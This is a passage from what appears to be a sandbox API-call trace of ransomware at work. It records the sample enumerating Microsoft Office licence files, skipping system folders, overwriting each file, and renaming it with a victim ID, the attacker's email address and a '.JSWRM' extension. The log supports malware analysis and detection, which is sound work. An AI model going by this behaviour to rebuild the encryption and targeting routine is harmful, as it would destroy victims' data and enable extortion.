ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6ef3604, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d97, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", cAlternateFileName="O365SM~2.XRM")) returned 1 [0105.737] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.737] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.737] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.737] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.737] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.737] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.737] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.737] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.737] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.738] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0105.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0105.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0105.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d298, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0105.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0105.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0105.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0105.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.738] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11671) returned 1 [0105.738] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0105.739] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0105.740] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.740] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0105.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.741] CloseHandle (hObject=0x45c) returned 1 [0105.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0105.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0105.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0105.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0105.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0105.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.741] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0105.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0105.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.742] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6f19863, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6f19863, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6fb21bb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bcf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription2-pl.xrm-ms", cAlternateFileName="O35234~1.XRM")) returned 1 [0105.742] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpString2=".") returned 1 [0105.742] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpString2="..") returned 1 [0105.742] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpString2="...") returned 1 [0105.742] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpString2="windows") returned -1 [0105.742] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpString2="recovery") returned -1 [0105.742] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.742] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.742] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.742] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.742] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpString2="msocache") returned 1 [0105.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0105.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0105.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0105.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0105.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0105.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0105.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0105.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.743] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11215) returned 1 [0105.743] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0105.743] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.745] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.746] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.746] CloseHandle (hObject=0x45c) returned 1 [0105.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0105.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0105.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0105.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0105.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0105.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.746] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0105.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0105.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.747] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6ecd3ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6ecd3ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6f8bf05, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6c57, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription2-ppd.xrm-ms", cAlternateFileName="O392C3~1.XRM")) returned 1 [0105.747] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpString2=".") returned 1 [0105.747] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpString2="..") returned 1 [0105.747] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpString2="...") returned 1 [0105.747] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpString2="windows") returned -1 [0105.747] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.747] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.747] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.747] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.747] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.748] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0105.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0105.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0105.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription2-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0105.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0105.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0105.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0105.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.749] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=27735) returned 1 [0105.749] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6c50) returned 0x24c1d0 [0105.749] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6c50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6c50, lpOverlapped=0x0) returned 1 [0105.758] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.758] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6c50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6c50, lpOverlapped=0x0) returned 1 [0105.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.759] CloseHandle (hObject=0x45c) returned 1 [0105.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0105.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0105.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0105.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0105.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0105.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.759] 